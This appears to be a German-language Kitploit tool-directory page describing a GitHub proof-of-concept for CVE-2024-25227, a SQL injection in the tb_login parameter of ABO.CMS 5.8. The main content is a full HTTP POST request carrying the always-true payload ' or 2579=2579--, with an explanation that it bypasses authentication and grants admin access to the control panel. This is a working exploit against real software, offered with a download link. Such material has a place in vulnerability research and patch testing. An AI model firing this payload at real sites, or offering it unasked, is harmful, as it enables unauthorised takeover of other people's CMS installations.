Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — SQL-Injection-Exploit für ABO.CMS 5.8, der die Authentifizierung über den tb_login-Parameter umgeht und nicht authentifizierten Zugriff auf das Admin-Panel gewährt. Enthält PoC-HTTP-Anfrage mit Payload. | Kitploit
Tools/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

SQL-Injection-Exploit für ABO.CMS 5.8, der die Authentifizierung über den tb_login-Parameter umgeht und nicht authentifizierten Zugriff auf das Admin-Panel gewährt. Enthält PoC-HTTP-Anfrage mit Payload.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
4vor 2 JahrenNoch nicht geprüft

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

CVE-2024-25227 Exploit

CVE-2024-25227 ist eine ABO.CMS 5.8 SQLi-Schwachstelle, die im Parameter "tb_login" gefunden wurde.

PoC:

root@kitploit:~
POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

Details

Der Payload ist tb_login=27872164'%20or%202579%3d2579--%20, ohne URL-Kodierung lautet er: 27872164' or 2579=2579--

Mit der modifizierten Anfrage mit dem Payload teilst du dem Backend mit, dass der Platzhalter "27872164'" mit einer Bedingung kombiniert wird, die immer wahr ist ("2579=2579"), und dass der Rest der Abfrage mit "--" auskommentiert wird, um sicherzustellen, dass die modifizierte Abfrage eingeschleust wird. Dies umgeht effektiv alle Authentifizierungsprüfungen im Zusammenhang mit dem Feld "tb_login" und ermöglicht nicht authentifizierten Zugriff auf das Control Panel mit Admin-Rechten.

Tool herunterladen